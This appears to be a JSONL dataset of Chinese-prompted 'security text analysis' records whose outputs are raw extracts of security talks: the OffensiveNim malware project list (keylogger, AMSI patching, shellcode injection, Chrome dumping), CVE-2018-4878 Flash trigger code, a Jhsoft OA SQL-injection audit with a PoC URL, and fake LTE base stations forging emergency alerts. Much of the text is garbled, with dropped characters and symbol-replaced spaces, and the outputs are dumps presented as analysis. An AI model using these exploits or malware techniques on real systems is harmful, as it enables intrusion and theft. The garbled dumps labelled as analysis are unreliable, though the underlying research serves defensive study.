wasm由JVM解释执行是否会支持C/C++等高级语言也可以导入wasm完成某些功能将这些功能隐藏在wasm中 具有相当好的隐蔽性如何对其进行检测 代码保护 wasm文件格式清晰非常 容易直接获取代码对代 码应如何混淆并加以保护 本地动态行为检测 WASM文件执行情况及功能的 动态检测方案 网络数据流实时检测 在下载或发送时对其进行检测 加密流量的分离及分析 漏洞挖掘 利用其能将高级语言编译为 webbytecode的特性挖掘相 关漏洞 代码保护 WAF相关 漏洞相关 行为检测 引用及参考  https://github.com/WebAssembly  https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Globa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 些malware-dev开源项介绍-nim 项列表 OffensiveNim pop_bin.nim 作 编译 运 pop_winim_bin.nim 作 编译 运 pop_winim_lib.nim 作 编译 运 execute_assembly_bin.nim 作 编译 运 clr_host_cpp_embed_bin.nim 作 编译 运 scshell_c_embed_bin.nim 作 编译 运 fltmc_bin.nim 作 2 编译 运 blockdlls_acg_ppid_spoof_bin.nim 作 编译 运 named_pipe_client_bin.nim && named_pipe_server_bin.nim 作 编译 运 embed_rsrc_bin.nim 作 编译 运 self_delete_bin.nim 作 编译 运 encrypt_decrypt_bin.nim 作 编译 运 amsi_patch_bin.nim && execute_powershell_bin.nim 作 编译 运 etw_patch_bin.nim 作 编译 运 wmiquery_bin.nim 作 3 编译 运 out_compressed_dll_bin.nim 作 编译 运 dynamic_shellcode_local_inject_bin.nim 作 编译 运 shellcode_callback_bin.nim 作 编译 运 shellcode_bin.nim 作 编译 运 shellcode_fiber.nim 作 编译 运 shellcode_inline_asm_bin.nim 作 编译 运 syscalls_bin.nim 作 编译 运 passfilter_lib.nim 作 4 编译 运 minidump_bin.nim 作 编译 运 http_request_bin.nim 作 编译 运 execute_sct_bin.nim 作 编译 运 scriptcontrol_bin.nim 作 编译 运 excel_com_bin.nim 作 编译 运 keylogger_bin.nim 作 编译 运 uuid_exec_bin.nim 作 编译 运 unhookc.nim 作 5 编译 运 unhook.nim 作 编译 运 taskbar_ewmi_bin.nim 作 编译 运 fork_dump_bin.nim 作 编译 运 ldap_query_bin.nim 作 编译 运 sandbox_process_bin.nim 作 编译 运 list_remote_shares.nim 作 编译 运 chrome_dump_bin.nim 作 编译 运 suspended_thread_injection.nim 作 6 编译 运 steganography 简介 使 nim-strenc 简介 使 Nim-RunPE 简介 使 NimGetSyscallStub 简介 使 Nim_CBT_Shellcode 简介 使 nimcrypto 简介 使 winim 简介 使 NimlineWhispersP 简介 途 zippy 简介 途 nuglifier 简介 途 7 tiny-sqlite 简介 途 编译命令 参考献 OffensiveNim steganography nim-strenc Nim-RunPE NimGetSyscallStub Nim_CBT_Shellcode nimcrypto winim NimlineWhispers3 zippy nuglifier tiny_sqlite 该项是S3cur3Th1sSh1t佬开发的项当中的每个件都可以单独编译并且件名字标识了这份 代码起到的作 直接调MessageBoxA弹窗但需要定义系统api函数调的数据类型 项列表             OffensiveNim pop_bin.nim 作 编译 8 通过winim调windows api减少需要编写的nim代码 运 pop_winim_bin.nim 作 编译 Bash 复制代码 nim cc --app=console --cpu=amd64 -d:release -d:strip -- out=bin/pop_bin64.exe src\\pop_bin.nim 1 9 通过winim库调windows系统API并且编译DLL动态链接库导出函数为DllMain 运 pop_winim_lib.nim 作 编译 Bash 复制代码 nim cc --app=console --cpu=amd64 -d:release -d:strip -- out=bin/pop_wini", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTuning Your Brain Tuning Your Brain  Why does certain music get you out of a black hole?  Often when we're stuck in a black hole, or just can't figure the problem out - the right music will get us out of it. Why does this work? It seems motivating, and it seems like we solve problems easier, and it seems to create a flow. I'll be going over the basics of the brain structures, neurons, synapses and neurotransmitters, before getting to how music effects the brain, and how we think. Your Brain  Your brain is made of cells called neurons  Neurons are in 3 basic parts  cell body  dendrites [input]  presynaptic membrane is polarized.  axon [output]   movement along axon weakens as it travels  Could be seen as analog Your Brain  Neuron cells are cells are interconnected by synapses. from the neuron terminals [axon] to the membrane of the dendrite.  Between the terminal of the axon and membrane of the dendrite is known as the pre- synaptic gap Your Brain  Neurotransmitters  First discovered by Otto Loewi  There are approximately 100 billion neurons in the human brain.  Neurotransmitters are released from presynaptic terminal and across to the receptor membrane on the dendrite.  This causes either depolarization (excitatory  increased likelihood of firing ) or hyperpolarization (inhibitory- decreased likelihood of firing) of the membrane. If there is enough (action potential) the charge passes along the axon to the terminal and the process repeats. Neurotransmitters are inactivated after release  either through re-uptake mechanisms or enzyme action.  Neurotransmitters are inactivated after release  either through re-uptake mechanisms or enzyme action. Your Brain  Major Brain Structures  Frontal Lobe  Parietal Lobe  Occipital Lobe  Temporal Lobe [From Neuroscience For Kids] Brainwaves  What are brainwaves? How are they made?  Records of the electrochemical transmission  polarization/ depolarization at the synapse, action potential at the axon and dendrite.  Brainwaves frequen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 讨论交流 如果你有任何想要讨论的问题请选择 [Github Discussion](https://github.com/ctf-wiki/ctf-wiki/discussions) 或者 [Slack](https://join.slack.com/t/ctf-wiki/shared_invite/enQtNTkwNDg5NDUzNzAzLTQ3YTliNzI5OGNhM2NmNzI3NTU0YWRlNWFkY2EzYTExN2Y3ZjRkNzYzYmRhNDNlYmY5YTVmNjNhYjliZDgyNTY).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ECB ECB模式全称为电子密码本模式Electronic codebook ## 加密 ## 解密 ## 优缺点 ### 优点 1. 实现简单 2. 不同明文分组的加密可以并行计算速度很快 ### 缺点 1. 同样的明文块会被加密成相同的密文块不会隐藏明文分组的统计规律正如下图所示 为了解决统一明文产生相同密文的问题提出了其它的加密模式 ## 典型应用 1. 用于随机数的加密保护 2. 用于单分组明文的加密 ## 2016 ABCTF aes-mess-75 题目描述如下 ``` We encrypted a flag with AES-ECB encryption using a secret key, and got the hash: e220eb994c8fc16388dbd60a969d4953f042fc0bce25dbef573cf522636a1ba3fafa1a7c21ff824a5824c5dc4a376e75 However, we lost our plaintext flag and also lost our key and we can't seem to decrypt the hash back :(. Luckily we encrypted a bunch of other flags with the same key. Can you recover the lost flag using this? [HINT] There has to be some way to work backwards, right? ``` 可以看出这个加密是一个 ECB 加密然后 AES 是 16 个字节一组每个字节可以使用两个 16 进制字符表示因此我们每 32 个字符一组进行分组然后去对应的 txt 文件中搜索即可 对应 flag ``` e220eb994c8fc16388dbd60a969d4953 abctf{looks_like f042fc0bce25dbef573cf522636a1ba3 _you_can_break_a fafa1a7c21ff824a5824c5dc4a376e75 es} ``` 最后一个显然在加密时进行了 padding ## 题目 - 2018 PlaidCTF macsh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIts assembler, Jim, but not as we know it! Morgan Gangwere DEF CON 26 Dedication Never forget the shoulders you stand on. Thanks, Dad whoami Hoopy Frood Been fiddling with Linux SOCs since I fiddled with an old TS-7200 EmbeddedARM board Ive used ARM for a lot of services: IRC, web hosting, etc. Ive built CyanogenMod/LineageOS, custom ARM images, etc. A word of note There are few concrete examples in this talk. Im sorry. This sort of work is One part science One part estimation Dash of bitter feelings towards others Hint of What the fuck was that EE thinking? A lot comes from experience. I can point the way, but I cannot tell the future. Theres a lot of seemingly random things. Trust me, Itll make sense. ARMed to the teeth From the BBC to your home. Short history of ARM Originally the Acorn RISC machine Built for the BBC Micro! Acorn changed hands and became ARM Holdings Acorn/ARM has never cut silicon! Fun fact: Intel has produced ARM- based chips (StrongARM and XSCale) and still sometimes does! The ISA hasnt changed all that much. Embedded Linux 101 Anatomy of an Embedded Linux device. Fundamentally 3 parts Storage SoC/Processor RAM Everything else? Bonus. PHYs on everything from I2C, USB to SDIO Cameras and Screens are via MIPI-defined protocols, CSI and DSI respectively At one point, they all look mostly the same. What is an SoC? Several major vendors: Allwinner, Rockchip (China) Atheros, TI, Apple (US) Samsung (Korea) 80-100% of the peripherals and possibly storage is right there on die Becomes a just add peripherals design Some vendors include SoCs as a part of other devices, such as TI's line of DSPs with an ARM SoC used for video production hardware and the like. In some devices, there may be multiple SoCs: A whole line of Cisco-owned Linux-based teleconferencing hardware has big banks of SoCs from TI doing video processing on the fly alongside a DSP. What is an SoC? Internal bus Peripheral Controller LTE modem Ethernet PHY I2C/SPI External Peripherals RAM (s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCheating in eSports How to cheat at virtual cycling using USB hacks Brad Dixon, Carve Systems Photo by Markus Spiske on Unsplash Sweaty eSports EGVsOG CVRWorldCup Virtual Cycling is Part of Cycling Cycling: Over 100 Years of Cheating Innovation 1903, 1904: Hippolyte Aucouturier 1904: Maurice Garin 1947: Jean Robic Will people cheat at virtual cycling, too? \"This is a sport with literally hundreds of dollars on the line, and dozens of fans...the stakes are medium!\" Marty Hass -- Tour de Pharmacy, 2017, HBO No Marty Hass is not a real person. Dont you recognize Jeff Goldblum? It is a silly mockumentary. Have a laugh. Bike Radar: Best Cycling Smart Trainers - 10-Way Mega-Test Virtual Cycling: How does this work?  Just like any MMPOG plus  Sensors to measure real world performance  App-controlled resistance Speed Estimation  Course terrain model  Power  Rider mass  Drafting model? The Easy Way to Cheat at Virtual Cycling  Lighter riders go faster  Shorter riders draft better there are limits! given the same power 0 5 10 15 20 25 ZWIFT e-Racing Performance Limits (men, watts/kg) 20 min 5 min 1 min 5 sec Vulnerable Sensor Network HRM Cadence Power ANT+ USB Stick ANT+ RF @ 2457 Mhz GFSK Optional AES Cheat the Hard Way with USBQ HRM Cadence Power ANT+ USB Stick USB Host Zwift App Zwift API ANT+ RF @ 2457 Mhz GFSK Optional AES USB USBQ Hackin USB aint new  Facedancer: excellent!  Travis Goodspeed (@travisgoodspeed)  Sergey Bratus (@sergeybratus)  Kate Temkin (@ktemkin)  Dominic Spill (@dominicgs)  Michael Ossmann (@michaelossmann)  Hardware Village USB Links: Andrey Konovalov  USB Reverse Engineering: Down the Rabbit Hole: Grant devalias Glenn Just want to observe USB?  Requires Linux and the usbmon module.  Capture with tcpdump i usbmon0   Wireshark is great! usbip + Wireshark tcpdump + Wireshark  Linux usbip module can export USB devices over TCP.  Capture TCP, observe in Wireshark. Stuff Brad Knows  Emulate USB host or device functions at the lowest level.  Behave badly a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Undergraduate Security Curriculum Daniel J. Burroughs University of Central Florida About myself  Assistant Professor at UCF  Research includes  Correlation of distributed network sensors  Law enforcement data sharing network University of Central Florida  Established in 1963  Part of the Florida State University System  Located 13 miles east of Orlando  42,837 Students  5,500 in Engineering and Computer Science Information Systems Technology  IST  Undergraduate program in the College of Engineering  Applied Engineering Degree  Heavy concentration of hands-on learning, real-world applications & experience The Challenge  Industry demand for trained security personnel  Traditional Computer Science/Engineering degrees do little to prepare someone to be a security professional  Our (attempt at a) solution  Develop a well rounded security program  Teach the security mindset  Get out of the books and on the networks The Fundamentals  Program is part of the College of Engineering  Analytical problem solving background  Ability to break down problems  Design of large scale systems and solutions  During first two years, students are encourage to pursue various certifications  General alphabet soup of certificates  Concentration on network administration The Fundamentals  Program breaks down into four tracks  Security core  Firewall, IDS, & Forensics  Secure system development  Other topics  Focuses on all aspects of security, not just computer and network  Ties in with Criminal Justice Department and the College of Health and Public Affairs System Applications in C/C++ Information Systems Applications Applied Systems Analysis Secure System Design Computer & Network Security Security Methods & Practices Applied Defense Strategies Investigative Digital Forensics Security Sensors & Biometrics Computer Security Management Applied Operating Systems Current Topics in Security Technical Administration Applications Secure System Development Security Core Firewalls, IDS, Forensics", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGrasshopper always wrong in argument with Chicken. - Book of Chan Functional Fuzzing with Funk and further explorations into the use of functional languages for network scripting Benjamin Kurtz Q:WTF? A: Funk is a framework for the scripted generation of network traffic, written using the Chicken Scheme-to-C compiler. Funk is...  Simple  Tiny  Powerful  Extensible  Platform Independent and Protocol Agnostic  Easily described by random adjectives Most Important Idea Funk creates a generic interface to every network protocol! This lets you keep your fuzzing logic separate from your protocol logic! Ok, but can it do?  Fuzzing  Flooding  Spoofing  Traffic Generation Long Term Goals  Query-Response  Arbitrary Network Scripting  Rapid Prototyping  Virtual Servers  Firewall and IDS Previous Design  XML-based scripts in flat file DB  C/++ parser generator engine  Domain-Specific Language, limited by regular grammars  Imperfect, but still made some money Why That Sucked  Checksums  Internet Header Length  Type-Length Value Fields  ICMP, DHCP, ASN.1 Protocol logic and fuzzing logic were necessarily intertwined... Cue the music... Scheme FAQ  What the hell is Scheme anyway?  Seriously, whats up with all the parentheses?  Why are LISP programmers so smug?  Why cant you just use C like normal people? Leave In Stupid Parentheses Why Scheme?  Programming metaphor better suited to problem (lambda calc vs. Turing machine)  Easily extensible  Well established, widely used  Portable  No Bit Rot! Why Chicken?  Actively developed  Highly optimized (fast even in interpreter)  Extends with Eggs or SWIG  Compiles to straight C  Functional language makes dealing with network protocols easy Chicken vs. Python Chicken Chicken Python Python Interpreted? Interpreted? Yes Yes Compiles? Compiles? to C to Java Lambdas? Lambdas? Yes Yes Painfully Slow? Painfully Slow? No Yes Stupid? Stupid? Parentheses Whitespace Tastes Like? Tastes Like? Chicken Chicken Implementation Packet Scripting  Abstract Op", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBrowser Script Engine Zero Days in 2018 Elliot Cao Trend Micro 2019-05-30 Whoami  Previous occupation is electrical engineer  Joined in Trend Micro in 2017  Sandbox developer  Started browser vulnerability research in 2018  Focus on browser script engine  Lei Cao (@elli0tn0phacker) Agenda  Browser Zero Days in 2018  VBSEmulator  Chakra Browser Zero Days in 2018 Browser Zero Days in 2018  Flash: CVE-2018-4878 CVE-2018-15982  VBScript: CVE-2018-8174 CVE-2018-8373  JScript: CVE-2018-8653 Flash Zero Days in 2018  CVE-2018-4878 var psdk:PSDK = PSDK.pSDK; var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher(); this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher); this.my_DRMListerner = new DRMOperationCompleteListener (); this.mediaPlayer.drmManager.initialize(this.my_DRMListerner); this.my_DRMListerner = null; try { new LocalConnection().connect(\"foo\"); new LocalConnection().connect(\"foo\"); } catch (e:Error) { my_DRMListerner_vuln = new DRMOperationCompleteListener (); } Flash Zero Days in 2018  CVE-2018-4878 Create an Object var psdk:PSDK = PSDK.pSDK; var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher(); this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher); this.my_DRMListerner = new DRMOperationCompleteListener (); this.mediaPlayer.drmManager.initialize(this.my_DRMListerner); this.my_DRMListerner = null; try { new LocalConnection().connect(\"foo\"); new LocalConnection().connect(\"foo\"); } catch (e:Error) { my_DRMListerner_vuln = new DRMOperationCompleteListener (); } var psdk:PSDK = PSDK.pSDK; var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher(); this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher); this.my_DRMListerner = new DRMOperationCompleteListener (); this.mediaPlayer.drmManager.initialize(this.my_DRMListerner); this.my_DRMListerner = null; try { new LocalConnection().connect(\"foo\"); new LocalConnection().connect(\"foo\"); } catch (e:Error) { my_DRMListerner_vuln = new DRMOperationCompleteListener (); } Flash Ze", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/5/26 22:55 2022-5-26-Jhsoft-OA-SQL file:///C:/Users/ASUS/AppData/Local/Temp/mume2022426-24848-1h4aa2u.w9xa.html 1/4 金和OA C6代码审计 SQL注入 金和版本C6V3.0的n day年前同事透露了金和OA这个n day我眼疾手快截了图下来并记了路径 由于当时还在实习太菜了未学习C#的代码审计因此没有深究漏洞成因这几天整理去年的材料时 发现手上正好有新版的金和OA备份文件就简单来审计利用链 漏洞在jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo方法中其中HomeService 为Webservice文件 在HomeService的GetHomeInfo方法中首先stringBuilder新建了字符串常量池 2022/5/26 22:55 2022-5-26-Jhsoft-OA-SQL file:///C:/Users/ASUS/AppData/Local/Temp/mume2022426-24848-1h4aa2u.w9xa.html 2/4 之后调用GetQuickUserInfo查询userID 再return抽象类ExecProcReDataTable没有可控参数拼接 回到GetHomeInfo方法进入quickUserInfo判断条件由于quickUserInfo数组并不存在PhotoURL参 数text为空进入判断MapAndFindFilebyRelativeFilePath方法 2022/5/26 22:55 2022-5-26-Jhsoft-OA-SQL file:///C:/Users/ASUS/AppData/Local/Temp/mume2022426-24848-1h4aa2u.w9xa.html 3/4 判断为falsetext设为空释放类quickUserInfo text为空进入条件string userSex = GetUserSex(userID); 此处就可以看到userId拼接进了SQL语句中进行处理造成了SQL注入 string queryString = \"select DossValue from dossiervalue a left join users b on a.RegCode=b.userid where a.DossierFieldID='3' and b.userid='\" + userId + \"'\"; 最后它的利用POC是 2022/5/26 22:55 2022-5-26-Jhsoft-OA-SQL file:///C:/Users/ASUS/AppData/Local/Temp/mume2022426-24848-1h4aa2u.w9xa.html 4/4 http://XXXX/c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=payload", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacks from a New Front Door in 4G & 5G mobile networks Dr. Altaf Shaik & Shinjo Park TU Berlin & FastIoT Blackhat USA 2022 Attacks so far in mobile networks  Radio access network  IMSI catchers, False base stations  Signaling interconnect  SS7, Diameter interfaces  SIM attacks  authentication, sim jacker  SMS spam, smshing  Backdoors (Wiretapping) New front door: exposure function Core Exposure Function 4G/5G Core SS7/ Diameter RAN Network Partners Vertical Industries Third-party Application developers New Door Devices/IoT New front door: exposure function Server from (MVNO, MNO, IoT service Provider, platform provider) Internet Core Vertical Industries Third-party Application developers REST APIs Exposure Function 4G/5G Core Northbound APIs Service APIs RAN Enterprise domain Applications domain Exposure function: Drone use-case Source: https://www.connectivity.technology/2021/01/cellular-connected-drones-to-form-part.html Cellular-connected Drones to Form Part of Vodafones Telco as a Service (TaaS) Model Vodafones 5G Mobility Lab in Aldenhoven, Germany Overview  Access to network exposure  Features and configurations  Security investigation  Design risks  Findings (vulnerabilities)  Responsible Disclosure  Takeaways Control IoT with 4G and 5G networks API Server (Provider) IoT Service Platform Backend IoT Connectivity Management Platform </> API Portal Service APIs Internet Cloud Vertical Industries Third-party Application developers REST APIs Exposure Function 4G/5G Core Network + IoT SIM Access to network exposure services via IoT service platforms  IoT SIM cards (with IP-data and SMS tariff)  e.g., 750MB, 250 SMS, 10 year lifetime, roaming free, 10 $$  Radio connectivity: 4G networks (NB-IoT, LTE-M, 2G)  Contact service provider for IoT platform access Prove industry/ company identity (e.g.,using Tax ID) Subscribe to a business plan (including NB-IoT/ LTE-M SIM cards Receive SIM cards (Mail) and API portal access (email) SIM card and API user(s) activation: cr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Second Edition: Remembering Who We Are by Richard Thieme Most of us live a large part of our lives skating on the ice of trivial essentials, the necessary tasks that fill our waking days. We pause from time to time and look at the etched images in the ice and think, this is the pattern of our lives, these images reveal our character and choices. But more, much more, is going on. Occasionally, the ice thins, heeding a midwinter springtime we dont know how to define, a season hidden inside us, a season determined by a different sun. That sun knows what we need and when we need it. Our readiness is all. The ice cracks and we fall into darkness that explodes paradoxically with light, we are saturated, immersed in the root sources of meaning. We know in those moments what matters, what is real. The contents of ordinary days quickly return and fill our waking state, the meaning of those moments almost but not quite forgotten. But we never really forget. And next time it happens, we recognize the experience for what it is. We link those moments into a different, more fundamental pattern, we say to ourselves, yes. I know this place. I have been here before. We remember who we really are. A few years ago, a long friendship with another couple kind of played itself out. It drifted for a year or two toward an end with a whimper, not a bang, as relationships often do. We had taken different paths, with divergent interests, values, and choices, and moved apart. After a while, there wasnt much point in getting together anymore. That was acceptable. We knew that people grow and change. It happens. Our lives, filled with those trivial essentials, moved on. Then, a few weeks ago, seemingly out of nowhere, I felt intense waves of energy that surged or swept up in me or into me  the metaphors dont really enlighten, they merely point toward things we dont know how to explain  strong palpable waves associated with the name of the woman. As they came, I knew it had something to do wi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993-1994 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: catch.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName db", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChris&Li(lebury& Senior&Penetra4on&Tester&with&Knowledge&Consul4ng&Group& Chris.Li(lebury@KnowledgeCG.com& & I&like&building&stuff.& About&me& DDISCLAIMERD& I&am:&  Providing&ideas,&examples,&and&code&of&whats&worked&for&me.&  Open&to&ques4ons&aQerward&and&sugges4ons.& & I&am&not:&  GeRng&paid&to&endorse&any&products.&  Promising&an&end&to&burglaries.&  Advoca4ng&seRng&up&booby&traps&in&your&home.&  Challenging&anyone&to&test&my&home.&&Please,&please&do&not.& & & Once&Upon&a&Time&in&South&Texas& Once&Upon&a&Time&in&South&Texas& Once&Upon&a&Time&in&South&Texas& My&$1500&Thief&Magnet& *h(p://learningcenter.statefarm.com/ auto/safety/mostDstolenDcarsDofD2009/& I&Had&an&Idea&  Remove&the&main&fuel& relay&at&night&  Install&twoDway&alarm& system&with&only&paging& func4onality.& Success!& (Depending&on&how&you&look&at&it)& My&Awesome&Apartment&Complex& /u/TheDovahkiinsDad&(Not&me&or&my&pic)& & h(p://www.reddit.com/r/WTF/comments/ 2784oo/ my_buddies_jeep_was_set_on_fire_by_some_ crazy_ass/& & Movin&on&Up& Tips&From&Cops&  Make&your&home&look&occupied,&and&make&it&difficult&to&break&in.&  Leave&lights&on&when&you&go&out.&If&you&are&going&to&be&away&for&a&length&of&4me,& connect&some&lamps&to&automa4c&4mers&to&turn&them&on&in&the&evening&and&off& during&the&day.&  Lock&all&outside&doors&and&windows&before&you&leave&the&house&or&go&to&bed.&Even& if&it&is&for&a&short&4me,&lock&your&doors.&  Keep&your&garage&door&closed&and&locked.&  Don't&allow&daily&deliveries&of&mail,&newspapers&or&flyers&build&up&while&you&are& away.&Arrange&with&the&Post&Office&to&hold&your&mail,&or&arrange&for&a&friend&or& neighbor&to&take&them&regularly.& h(p://www.sjpd.org/bfo/community/Crimeprev/Preven4onTips/Prevent_Burglary.html& X10&Protocol& DCreated&in&the&late&1970s.& & DData&is&encoded&onto&a&120khz&carrier&which&is&transmi(ed&as&bursts& during&the&zero&crossings&of&the&60hz&AC&waveform.&&One&bit&is& transmi(ed&at&each&zero&crossing.& & DFour&bit&house&code,&four&bit&unit&code,&and&four& &bit&command.& ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIm your MAC(b) Daddy Grayson Lenik  Trustwave @handlefree Copyright Trustwave 2010 Confidential Bio  Security Consultant for Trustwaves Spiderlabs.  Author of the Digital Forensics blog An Eye on Forensics  GIAC Certified Forensic Analyst (GCFA)  Microsoft Certified Systems Engineer (MCSE)  Qualified Security Assessor (QSA) Copyright Trustwave 2010 Confidential Agenda  What are MACB times?  Where are they stored?  What is a forensic timeline?  Why is it useful?  Why do it may way?  Doing it my way  My way just got easier  Timestamp alteration (Timestomping)  Defeating timestamp alteration  Case studies and examples.  Tools  Conclusion Copyright Trustwave 2010 Confidential MAC(b) Times What do they stand for? The MAC(b) times are derived from file system metadata and they stand for: Modified Accessed Changed ($MFT Modified) and Birth (file creation time) The (b) is in parentheses because not all file systems record a birth time. For the purposes of this presentation I focus on the NTFS file system as it is the most common file system we see when working investigations. Copyright Trustwave 2010 Confidential Where are they stored? Two places, both are located in the Master File Table ($MFT): The first is $STANDARD_INFO Attribute. $STANDARD_INFO ($SI) stores file metadata such as flags, the file SID, the file owner and a set of MAC(b) timestamps. $STANDARD_INFO is the timestamp collected by Windows explorer, fls, mactime, timestomp, find and the other utilities related to the display of timestamps. *http://blogs.technet.com/b/ganand/archive/2008/02/19/ntfs-time-stamps-file- created-in-1601-modified-in-1801-and-accessed-in-2008.aspx Copyright Trustwave 2010 Confidential Where are they stored? The second attribute is $FILE_NAME Att. $FILE_NAME ($FN) contains the filename in Unicode and another set of MAC(b) timestamps. The difference? $STANDARD_INFO can be modified by user level processes like timestomp. $FILE_NAME can only be modified by the system kernel. There are no k", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking(Public(Warning(System(in(LTE( Mobile(Network Li, Weiguang weelight.li@gmail.com ( UnicornTeam@360 Technology ( Agenda 01(About(Public(Warning(System(in(LTE(Network( ( 02(The(Vulnerability(in(LTE(Protocol( ( 03(Trigger(the((Vulnerability( ( (a.(Build(a(Fake(LTE(Base(Station( ( (b.(Forge(the(Fake(Warning(Messages( ( 04(Conclusion( 01 About Public Warning System in LTE Network Alert(the(Public(to(Such(Disasters( PWS(Warning(System(All(Over(the(World ETWS KPAS EU-ALERT CMAS  Hawaiian(Missile(Alert(in(January(2018( Press(Release(  Hawaiian(Missile(Alert(in(January(2018( Press(Release( 02 The Vulnerability in LTE Protocol Vulnerabilities(in(LTE(Protocol 1. The(warning(messages(over(the(air(are(not(encrypted(or( intergity(protected.( 2. UE(doesnt(authenticate((the(base(station(during(reselection( Attack(vector 03 Trigger the vulnerability( How(to(Build(a(Fake(LTE(Network USRP(B210 ThinkPad( srsLTE(/srsENB Hardware Software Act like a Normal Base Station How to get these parameters Configuration/in/srsENB/ LTE/Discovery/App/ srsLTE/config/file/ PWS(Message's(CarrierSystem(Information(Block SIB/Type/1/ SIB(scheduling(information SIB/Type/2/ Common(and(shared(channel( information SIB/Type/3/ Cell(re-selection(information( SIB/Type/4/ Cell(re-selection(information( intra-frequency(neighbor( information SIB/Type/5/ Cell(re-selection(information( Intra-frequency(neighbor( information SIB/Type/6/ Cell(re-selection(information( for(UTRA SIB/Type/7/ Cell(re-selection(information( for(GERAN SIB/Type/8/ Cell-re-selection(information( for(CDMA2000 SIB/Type/9/ Home(eNB(identifier SIB/Type/10/ ETWS(primary(notification( (Japan) SIB/Type/11/ ETWS(Secondary(Notification( (Japan) SIB/Type/12/ EU-Alert((Europe)( KPAS((South(Korea)( CMAS(notification(USA)( Forge(the(ETWS(Message Four(main(components(getting(involved(in(sending(ETWS  SIB(10(:(Primary(Notification(  SIB(11(:(Secondary(Notification(  Paging(:(ETWS(indication(  SIB(1:(Schedule(SIB(10(and(SIB(11( ETWS(Primary(Notification", "category": "text_analysis", "source": "security_papers"}
